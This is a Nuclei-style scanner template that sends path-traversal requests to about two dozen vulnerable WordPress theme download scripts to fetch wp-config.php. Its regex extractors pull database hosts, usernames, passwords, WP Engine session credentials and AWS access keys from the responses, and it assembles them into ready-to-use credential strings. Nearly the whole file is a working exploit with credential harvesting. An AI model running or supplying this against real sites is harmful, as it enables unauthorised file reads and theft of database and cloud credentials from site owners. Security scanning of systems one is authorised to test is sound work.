id: wp-themes
info:
  name: WordPress_Multiple_themes_-download.php_Arbitrary_File_Download
  author: nucleixivanovich
  description: Vuln in multiple plugins for read wp-config.php
  reference: https://neal.fun/
  severity: high


requests:
  - method: GET
    path:
      - '{{BaseURL}}//wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php'
      - '{{BaseURL}}//wp-content/themes/SMWF/inc/download.php?file=../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/markant/download.php?file=../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/yakimabait/download.php?file=./wp-config.php'
      - '{{BaseURL}}//wp-content/themes/TheLoft/download.php?file=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/felis/download.php?file=../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/epic/includes/download.php?file=wp-config.php'
      - '{{BaseURL}}//wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/lote27/download.php?download=../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/RedSteel/download.php?file=../../../wp-config.php'  
      - '{{BaseURL}}//wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'
      - '{{BaseURL}}//wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
      - '{{BaseURL}}//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
      - '{{BaseURL}}//wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php'  
      - '{{BaseURL}}//wp-content/themes/incrediblewp/revslider/'
      - '{{BaseURL}}//wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'          
      - '{{BaseURL}}//wp-content/themes/RedSteel/download.php?file=../../../wp-config.php'                  

    headers:
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/7.1.2 Safari/537.85.11

    stop-at-first-match: true
    matchers-condition: or    
    matchers:
      - type: dsl
        dsl:
        - status_code==200 && contains(body,"WPENGINE_ACCOUNT")
        - status_code==200 && contains(body,"DB_PASSWORD")
        - status_code==200 && contains(body,"DB_PASS")
        - status_code==200 && contains(body,"PASSWD")
        - status_code==200 && contains(body,"db_pwd")
        - status_code==200 && contains(body,"define(")        
        - status_code==200 && contains(body,'/** MySQL database username */') && contains(body,'define(')        
        - status_code==200 && contains(body,"<?php") && contains(body,"con_db_host") && contains(body,"con_db_name")
        - status_code==200 && contains(body,"con_db_host")
        - status_code==200 && contains(body,"con_db_id") && contains(body,"con_db_name")          
        condition: or

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
        condition: or        

  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"             

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])

      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'